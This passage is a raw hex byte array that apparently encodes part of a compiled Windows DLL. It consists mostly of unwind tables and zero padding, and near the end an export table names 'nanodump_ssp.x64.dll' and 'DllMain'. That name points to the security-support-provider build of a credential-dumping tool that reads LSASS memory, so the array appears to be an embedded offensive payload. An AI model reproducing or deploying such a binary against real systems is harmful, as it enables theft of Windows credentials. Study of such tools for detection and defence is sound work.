,0x00,0x00,0x19,0x20,0x00,0x00,0xE7,0x20,0x00,0x00,0xD4,0xC0,0x00,0x00,0xE7,0x20,0x00,0x00,0x45,0x21,0x00,0x00,0xE0,0xC0,0x00,0x00,0x45,0x21,0x00,0x00,0x54,0x21,0x00,0x00,0xEC,0xC0,0x00,0x00,0x54,0x21,0x00,0x00,0xBF,0x21,0x00,0x00,0xF4,0xC0,0x00,0x00,0xBF,0x21,0x00,0x00,0x30,0x23,0x00,0x00,0x00,0xC1,0x00,0x00,0x30,0x23,0x00,0x00,0x6E,0x23,0x00,0x00,0x0C,0xC1,0x00,0x00,0x6E,0x23,0x00,0x00,0x80,0x23,0x00,0x00,0x18,0xC1,0x00,0x00,0x80,0x23,0x00,0x00,0x8D,0x24,0x00,0x00,0x20,0xC1,0x00,0x00,0x8D,0x24,0x00,0x00,0xE7,0x24,0x00,0x00,0x2C,0xC1,0x00,0x00,0xE7,0x24,0x00,0x00,0x49,0x25,0x00,0x00,0x38,0xC1,0x00,0x00,0x50,0x25,0x00,0x00,0x78,0x25,0x00,0x00,0x44,0xC1,0x00,0x00,0x78,0x25,0x00,0x00,0x5F,0x26,0x00,0x00,0x50,0xC1,0x00,0x00,0x5F,0x26,0x00,0x00,0x56,0x27,0x00,0x00,0x5C,0xC1,0x00,0x00,0x56,0x27,0x00,0x00,0x09,0x28,0x00,0x00,0x68,0xC1,0x00,0x00,0x09,0x28,0x00,0x00,0x82,0x2A,0x00,0x00,0x74,0xC1,0x00,0x00,0x90,0x2A,0x00,0x00,0x99,0x2A,0x00,0x00,0x80,0xC1,0x00,0x00,0x99,0x2A,0x00,0x00,0xB1,0x2A,0x00,0x00,0x84,0xC1,0x00,0x00,0xB1,0x2A,0x00,0x00,0xEC,0x2B,0x00,0x00,0x90,0xC1,0x00,0x00,0xEC,0x2B,0x00,0x00,0x4A,0x2C,0x00,0x00,0x9C,0xC1,0x00,0x00,0x4A,0x2C,0x00,0x00,0x8E,0x30,0x00,0x00,0xA8,0xC1,0x00,0x00,0x8E,0x30,0x00,0x00,0xEA,0x30,0x00,0x00,0xB8,0xC1,0x00,0x00,0xEA,0x30,0x00,0x00,0x58,0x31,0x00,0x00,0xC4,0xC1,0x00,0x00,0x58,0x31,0x00,0x00,0x63,0x31,0x00,0x00,0xD0,0xC1,0x00,0x00,0x63,0x31,0x00,0x00,0x6B,0x31,0x00,0x00,0xD4,0xC1,0x00,0x00,0x6B,0x31,0x00,0x00,0xC5,0x31,0x00,0x00,0xD8,0xC1,0x00,0x00,0xC5,0x31,0x00,0x00,0x1F,0x32,0x00,0x00,0xDC,0xC1,0x00,0x00,0x1F,0x32,0x00,0x00,0x76,0x32,0x00,0x00,0xE0,0xC1,0x00,0x00,0x76,0x32,0x00,0x00,0xCD,0x32,0x00,0x00,0xE4,0xC1,0x00,0x00,0xCD,0x32,0x00,0x00,0x27,0x33,0x00,0x00,0xE8,0xC1,0x00,0x00,0x27,0x33,0x00,0x00,0x81,0x33,0x00,0x00,0xEC,0xC1,0x00,0x00,0x81,0x33,0x00,0x00,0xD8,0x33,0x00,0x00,0xF0,0xC1,0x00,0x00,0xD8,0x33,0x00,0x00,0x2F,0x34,0x00,0x00,0xF4,0xC1,0x00,0x00,0x2F,0x34,0x00,0x00,0x86,0x34,0x00,0x00,0xF8,0xC1,0x00,0x00,0x86,0x34,0x00,0x00,0xDD,0x34,0x00,0x00,0xFC,0xC1,0x00,0x00,0xDD,0x34,0x00,0x00,0x37,0x35,0x00,0x00,0x00,0xC2,0x00,0x00,0x37,0x35,0x00,0x00,0x8E,0x35,0x00,0x00,0x04,0xC2,0x00,0x00,0x8E,0x35,0x00,0x00,0xE5,0x35,0x00,0x00,0x08,0xC2,0x00,0x00,0xE5,0x35,0x00,0x00,0x3C,0x36,0x00,0x00,0x0C,0xC2,0x00,0x00,0x3C,0x36,0x00,0x00,0x96,0x36,0x00,0x00,0x10,0xC2,0x00,0x00,0x96,0x36,0x00,0x00,0xED,0x36,0x00,0x00,0x14,0xC2,0x00,0x00,0xED,0x36,0x00,0x00,0x44,0x37,0x00,0x00,0x18,0xC2,0x00,0x00,0x44,0x37,0x00,0x00,0x9B,0x37,0x00,0x00,0x1C,0xC2,0x00,0x00,0x9B,0x37,0x00,0x00,0xF2,0x37,0x00,0x00,0x20,0xC2,0x00,0x00,0xF2,0x37,0x00,0x00,0x49,0x38,0x00,0x00,0x24,0xC2,0x00,0x00,0x49,0x38,0x00,0x00,0xA0,0x38,0x00,0x00,0x28,0xC2,0x00,0x00,0xA0,0x38,0x00,0x00,0xF7,0x38,0x00,0x00,0x2C,0xC2,0x00,0x00,0xF7,0x38,0x00,0x00,0x4E,0x39,0x00,0x00,0x30,0xC2,0x00,0x00,0x4E,0x39,0x00,0x00,0xA8,0x39,0x00,0x00,0x34,0xC2,0x00,0x00,0xA8,0x39,0x00,0x00,0x02,0x3A,0x00,0x00,0x38,0xC2,0x00,0x00,0x02,0x3A,0x00,0x00,0x5C,0x3A,0x00,0x00,0x3C,0xC2,0x00,0x00,0x5C,0x3A,0x00,0x00,0xB6,0x3A,0x00,0x00,0x40,0xC2,0x00,0x00,0xB6,0x3A,0x00,0x00,0x10,0x3B,0x00,0x00,0x44,0xC2,0x00,0x00,0x10,0x3B,0x00,0x00,0x67,0x3B,0x00,0x00,0x48,0xC2,0x00,0x00,0x67,0x3B,0x00,0x00,0xBE,0x3B,0x00,0x00,0x4C,0xC2,0x00,0x00,0xBE,0x3B,0x00,0x00,0x15,0x3C,0x00,0x00,0x50,0xC2,0x00,0x00,0x15,0x3C,0x00,0x00,0x6F,0x3C,0x00,0x00,0x54,0xC2,0x00,0x00,0x6F,0x3C,0x00,0x00,0xC9,0x3C,0x00,0x00,0x58,0xC2,0x00,0x00,0xC9,0x3C,0x00,0x00,0x20,0x3D,0x00,0x00,0x5C,0xC2,0x00,0x00,0x20,0x3D,0x00,0x00,0x77,0x3D,0x00,0x00,0x60,0xC2,0x00,0x00,0x77,0x3D,0x00,0x00,0xD1,0x3D,0x00,0x00,0x64,0xC2,0x00,0x00,0xD1,0x3D,0x00,0x00,0x28,0x3E,0x00,0x00,0x68,0xC2,0x00,0x00,0x28,0x3E,0x00,0x00,0x7F,0x3E,0x00,0x00,0x6C,0xC2,0x00,0x00,0x7F,0x3E,0x00,0x00,0xD9,0x3E,0x00,0x00,0x70,0xC2,0x00,0x00,0xD9,0x3E,0x00,0x00,0x30,0x3F,0x00,0x00,0x74,0xC2,0x00,0x00,0x30,0x3F,0x00,0x00,0x87,0x3F,0x00,0x00,0x78,0xC2,0x00,0x00,0x87,0x3F,0x00,0x00,0xDE,0x3F,0x00,0x00,0x7C,0xC2,0x00,0x00,0xDE,0x3F,0x00,0x00,0x35,0x40,0x00,0x00,0x80,0xC2,0x00,0x00,0x35,0x40,0x00,0x00,0x8C,0x40,0x00,0x00,0x84,0xC2,0x00,0x00,0x8C,0x40,0x00,0x00,0xE3,0x40,0x00,0x00,0x88,0xC2,0x00,0x00,0xE3,0x40,0x00,0x00,0x3D,0x41,0x00,0x00,0x8C,0xC2,0x00,0x00,0x3D,0x41,0x00,0x00,0x97,0x41,0x00,0x00,0x90,0xC2,0x00,0x00,0x97,0x41,0x00,0x00,0xEE,0x41,0x00,0x00,0x94,0xC2,0x00,0x00,0xEE,0x41,0x00,0x00,0x48,0x42,0x00,0x00,0x98,0xC2,0x00,0x00,0x48,0x42,0x00,0x00,0x9F,0x42,0x00,0x00,0x9C,0xC2,0x00,0x00,0x9F,0x42,0x00,0x00,0xF6,0x42,0x00,0x00,0xA0,0xC2,0x00,0x00,0xF6,0x42,0x00,0x00,0x4D,0x43,0x00,0x00,0xA4,0xC2,0x00,0x00,0x4D,0x43,0x00,0x00,0xA4,0x43,0x00,0x00,0xA8,0xC2,0x00,0x00,0xA4,0x43,0x00,0x00,0xFE,0x43,0x00,0x00,0xAC,0xC2,0x00,0x00,0xFE,0x43,0x00,0x00,0x55,0x44,0x00,0x00,0xB0,0xC2,0x00,0x00,0x60,0x44,0x00,0x00,0xA9,0x44,0x00,0x00,0xB4,0xC2,0x00,0x00,0xA9,0x44,0x00,0x00,0x2C,0x45,0x00,0x00,0xC0,0xC2,0x00,0x00,0x2C,0x45,0x00,0x00,0x8E,0x46,0x00,0x00,0xCC,0xC2,0x00,0x00,0x8E,0x46,0x00,0x00,0x17,0x47,0x00,0x00,0xD8,0xC2,0x00,0x00,0x17,0x47,0x00,0x00,0x18,0x48,0x00,0x00,0xE4,0xC2,0x00,0x00,0x18,0x48,0x00,0x00,0x9F,0x4B,0x00,0x00,0xF0,0xC2,0x00,0x00,0x9F,0x4B,0x00,0x00,0x02,0x53,0x00,0x00,0xFC,0xC2,0x00,0x00,0x02,0x53,0x00,0x00,0x6E,0x53,0x00,0x00,0x0C,0xC3,0x00,0x00,0x6E,0x53,0x00,0x00,0xA6,0x55,0x00,0x00,0x18,0xC3,0x00,0x00,0xA6,0x55,0x00,0x00,0x65,0x59,0x00,0x00,0x24,0xC3,0x00,0x00,0x65,0x59,0x00,0x00,0x55,0x5A,0x00,0x00,0x30,0xC3,0x00,0x00,0x60,0x5A,0x00,0x00,0x08,0x5B,0x00,0x00,0x3C,0xC3,0x00,0x00,0x08,0x5B,0x00,0x00,0x92,0x5B,0x00,0x00,0x48,0xC3,0x00,0x00,0x92,0x5B,0x00,0x00,0x3D,0x5C,0x00,0x00,0x54,0xC3,0x00,0x00,0x3D,0x5C,0x00,0x00,0xB6,0x5D,0x00,0x00,0x60,0xC3,0x00,0x00,0xB6,0x5D,0x00,0x00,0x95,0x5F,0x00,0x00,0x70,0xC3,0x00,0x00,0x95,0x5F,0x00,0x00,0x37,0x61,0x00,0x00,0x7C,0xC3,0x00,0x00,0x40,0x61,0x00,0x00,0xB8,0x63,0x00,0x00,0x88,0xC3,0x00,0x00,0xB8,0x63,0x00,0x00,0xEC,0x64,0x00,0x00,0x94,0xC3,0x00,0x00,0xEC,0x64,0x00,0x00,0x82,0x65,0x00,0x00,0xA0,0xC3,0x00,0x00,0x82,0x65,0x00,0x00,0xC5,0x66,0x00,0x00,0xAC,0xC3,0x00,0x00,0xC5,0x66,0x00,0x00,0x24,0x68,0x00,0x00,0xB8,0xC3,0x00,0x00,0x24,0x68,0x00,0x00,0xDE,0x68,0x00,0x00,0xC4,0xC3,0x00,0x00,0xDE,0x68,0x00,0x00,0xD2,0x69,0x00,0x00,0xD0,0xC3,0x00,0x00,0xD2,0x69,0x00,0x00,0x67,0x6A,0x00,0x00,0xDC,0xC3,0x00,0x00,0x67,0x6A,0x00,0x00,0x28,0x6B,0x00,0x00,0xE8,0xC3,0x00,0x00,0x28,0x6B,0x00,0x00,0xC9,0x6B,0x00,0x00,0xF4,0xC3,0x00,0x00,0xD0,0x6B,0x00,0x00,0x6F,0x6F,0x00,0x00,0x00,0xC4,0x00,0x00,0x6F,0x6F,0x00,0x00,0xBF,0x6F,0x00,0x00,0x10,0xC4,0x00,0x00,0xC0,0x6F,0x00,0x00,0x03,0x70,0x00,0x00,0x1C,0xC4,0x00,0x00,0x10,0x70,0x00,0x00,0x8A,0x70,0x00,0x00,0x28,0xC4,0x00,0x00,0x90,0x70,0x00,0x00,0xAF,0x70,0x00,0x00,0x38,0xC4,0x00,0x00,0xB0,0x70,0x00,0x00,0xE0,0x70,0x00,0x00,0x3C,0xC4,0x00,0x00,0xE0,0x70,0x00,0x00,0x62,0x71,0x00,0x00,0x48,0xC4,0x00,0x00,0x70,0x71,0x00,0x00,0x73,0x71,0x00,0x00,0x58,0xC4,0x00,0x00,0x80,0x71,0x00,0x00,0xE9,0x71,0x00,0x00,0x5C,0xC4,0x00,0x00,0xF0,0x71,0x00,0x00,0x52,0x73,0x00,0x00,0x6C,0xC4,0x00,0x00,0x60,0x73,0x00,0x00,0xBD,0x76,0x00,0x00,0x7C,0xC4,0x00,0x00,0xC0,0x76,0x00,0x00,0x3B,0x77,0x00,0x00,0x94,0xC4,0x00,0x00,0x40,0x77,0x00,0x00,0xBF,0x77,0x00,0x00,0xA8,0xC4,0x00,0x00,0xC0,0x77,0x00,0x00,0x59,0x78,0x00,0x00,0xB8,0xC4,0x00,0x00,0x60,0x78,0x00,0x00,0x52,0x79,0x00,0x00,0xC8,0xC4,0x00,0x00,0x60,0x79,0x00,0x00,0x8C,0x79,0x00,0x00,0xD4,0xC4,0x00,0x00,0x90,0x79,0x00,0x00,0xE0,0x79,0x00,0x00,0xD8,0xC4,0x00,0x00,0xE0,0x79,0x00,0x00,0x86,0x7A,0x00,0x00,0xDC,0xC4,0x00,0x00,0x90,0x7A,0x00,0x00,0x10,0x7B,0x00,0x00,0xEC,0xC4,0x00,0x00,0x10,0x7B,0x00,0x00,0x47,0x7B,0x00,0x00,0xF0,0xC4,0x00,0x00,0x50,0x7B,0x00,0x00,0xC3,0x7B,0x00,0x00,0xF4,0xC4,0x00,0x00,0xD0,0x7B,0x00,0x00,0x06,0x7C,0x00,0x00,0xF8,0xC4,0x00,0x00,0x10,0x7C,0x00,0x00,0x99,0x7C,0x00,0x00,0xFC,0xC4,0x00,0x00,0xA0,0x7C,0x00,0x00,0x5E,0x7D,0x00,0x00,0x00,0xC5,0x00,0x00,0x60,0x7D,0x00,0x00,0x63,0x7D,0x00,0x00,0x04,0xC5,0x00,0x00,0xB0,0x7D,0x00,0x00,0xB6,0x7D,0x00,0x00,0x08,0xC5,0x00,0x00,0xC0,0x7D,0x00,0x00,0xE5,0x7D,0x00,0x00,0x0C,0xC5,0x00,0x00,0xF0,0x7D,0x00,0x00,0x16,0x7E,0x00,0x00,0x10,0xC5,0x00,0x00,0x20,0x7E,0x00,0x00,0x3D,0x7E,0x00,0x00,0x1C,0xC5,0x00,0x00,0x40,0x7E,0x00,0x00,0x18,0x7F,0x00,0x00,0x20,0xC5,0x00,0x00,0x20,0x7F,0x00,0x00,0x8E,0x7F,0x00,0x00,0x34,0xC5,0x00,0x00,0xD0,0x80,0x00,0x00,0xD5,0x80,0x00,0x00,0x44,0xC5,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x13,0x09,0x25,0x13,0x03,0x0E,0x32,0x0A,0x30,0x09,0x60,0x08,0x70,0x07,0xC0,0x05,0xD0,0x03,0xE0,0x01,0x50,0x00,0x00,0x01,0x11,0x08,0x25,0x11,0x03,0x0C,0x42,0x08,0x30,0x07,0x60,0x06,0x70,0x05,0xC0,0x03,0xD0,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x12,0x06,0x85,0x12,0x03,0x0A,0x01,0x4C,0x00,0x03,0x30,0x02,0x70,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x12,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x10,0x04,0x85,0x10,0x03,0x08,0x01,0x46,0x00,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x18,0x00,0x04,0x03,0x01,0x50,0x01,0x0B,0x04,0x05,0x0B,0x01,0x16,0x00,0x04,0x03,0x01,0x50,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x51,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x5B,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x5B,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x0B,0x04,0x55,0x0B,0x03,0x06,0xA2,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0xD2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xD2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x12,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xB2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x10,0x04,0x85,0x10,0x03,0x08,0x01,0x74,0x00,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x12,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0xE5,0x11,0x03,0x09,0x01,0x1D,0x00,0x02,0x30,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xD2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x35,0x0B,0x03,0x06,0x62,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0xB2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x1C,0x00,0x04,0x03,0x01,0x50,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x3B,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x12,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x14,0x00,0x04,0x03,0x01,0x50,0x01,0x0B,0x04,0x75,0x0B,0x03,0x06,0xE2,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xB2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x6D,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xF2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xF2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x18,0x00,0x04,0x03,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0xB2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x55,0x0B,0x03,0x06,0xA2,0x02,0x30,0x01,0x50,0x01,0x0B,0x04,0x35,0x0B,0x03,0x06,0x62,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x92,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x35,0x0B,0x03,0x06,0x62,0x02,0x30,0x01,0x50,0x01,0x12,0x06,0x85,0x12,0x03,0x0A,0x01,0x54,0x00,0x03,0x30,0x02,0x70,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0C,0x05,0x25,0x0C,0x03,0x07,0x32,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0C,0x05,0x25,0x0C,0x03,0x07,0x32,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x0C,0x05,0x35,0x0C,0x03,0x07,0x52,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x0D,0x06,0x55,0x0D,0x03,0x08,0xA2,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x15,0x0A,0x45,0x15,0x03,0x10,0x82,0x0C,0x30,0x0B,0x60,0x0A,0x70,0x09,0xC0,0x07,0xD0,0x05,0xE0,0x03,0xF0,0x01,0x50,0x01,0x11,0x08,0x25,0x11,0x03,0x0C,0x42,0x08,0x30,0x07,0x60,0x06,0x70,0x05,0xC0,0x03,0xD0,0x01,0x50,0x01,0x0D,0x06,0x25,0x0D,0x03,0x08,0x42,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x0C,0x05,0x25,0x0C,0x03,0x07,0x32,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x25,0x0B,0x03,0x06,0x42,0x02,0x30,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x0D,0x06,0x25,0x0D,0x03,0x08,0x42,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x0B,0x04,0x25,0x0B,0x03,0x06,0x42,0x02,0x30,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x0F,0x07,0x25,0x0F,0x03,0x0A,0x32,0x06,0x30,0x05,0x60,0x04,0x70,0x03,0xC0,0x01,0x50,0x00,0x00,0x01,0x0D,0x06,0x25,0x0D,0x03,0x08,0x42,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7C,0x79,0x7A,0x68,0x00,0x00,0x00,0x00,0x32,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x00,0x01,0x00,0x2C,0x00,0x01,0x00,0x30,0x00,0x01,0x00,0x6F,0x6F,0x00,0x00,0x47,0x00,0x01,0x00,0x00,0x00,0x6E,0x61,0x6E,0x6F,0x64,0x75,0x6D,0x70,0x5F,0x73,0x73,0x70,0x2E,0x78,0x36,0x34,0x2E,0x64,0x6C,0x6C,0x00,0x44,0x6C,0x6C,0x4D,0x61,0x69,0x6E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x